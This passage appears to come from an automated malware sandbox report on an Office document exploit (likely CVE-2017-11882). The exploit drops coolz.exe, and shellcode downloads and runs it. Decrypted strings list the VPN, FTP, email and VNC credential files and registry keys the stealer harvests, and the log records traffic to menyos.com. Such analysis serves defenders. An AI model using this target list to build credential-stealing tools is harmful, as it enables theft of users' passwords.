Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: %ProgramW6432%
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \account.json
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."username":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ."password":"(.?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: privateinternetaccess.com
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FileZilla
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </User>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: CoreFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: hdfzpysvpzimorhk
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HostName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UserName
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PublicKeyFile
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PortNumber
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ABCDEF
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Flash FXP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: port
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: user
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: quick.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Sites.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTP Navigator
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: No Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: WS_FTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HOST
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FtpCommander
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \cftp\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Server=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ;Anonymous=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \FTPGetter\servers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_ip>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_port>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_name>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: <server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: </server_user_password>
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \The Bat!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.CFN
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: DataDir
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Folder.lst
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbox.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PassWd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Becky!
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Outlook
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IMAP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3 Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HTTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Windows Mail App
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: syncpassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: mailoutgoing
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Executable
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: FoxmailPath
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Storage\
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Accounts\Account.rec0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Account.stg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPHost
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: IncomingServer
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Account
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: MailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POP3Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Opera Mail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: opera:
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PocoMail
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Pocomail\accounts.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: POPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTPPass
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SMTP
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client\accounts.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: eM Client
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Username":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "Secret":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: "ProviderName":"
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: o6806642kbM7c5
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SenderIdentities
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Server_Host
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Email
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Username
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: EncryptedPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Mailbird
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 4.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: RealVNC 3.x
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\ORL\WinVNC3
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: PasswordViewOnly
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TightVNC ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TightVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ControlPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: TigerVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Software\TigerVNC\Server
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: UltraVNC
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: passwd2
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: JDownloader 2.0\cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Source: 6.2.RegSvcs.exe.400000.0.unpack	String decryptor: Paltalk

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.21.35.109 Port: 443

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Local\Temp\coolz.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.35.109:443 -> 192.168.2.22:49163 version: TLS 1.2

Source:

Binary string: wntdll.pdb source: coolz.exe, 00000005.00000003.483771153.0000000003970000.00000004.00001000.00020000.00000000.sdmp, coolz.exe, 00000005.00000003.483536666.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036706E2 URLDownloadToFileW,	2_2_036706E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670659 LoadLibraryW,URLDownloadToFileW,	2_2_03670659
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367072D WinExec,ExitProcess,	2_2_0367072D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705E9 URLDownloadToFileW,	2_2_036705E9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03670673 URLDownloadToFileW,	2_2_03670673
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0367074D ExitProcess,	2_2_0367074D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705CD URLDownloadToFileW,	2_2_036705CD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036705B4 ExitProcess,	2_2_036705B4

Source: global traffic

DNS query: name: menyos.com

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.35.109:443
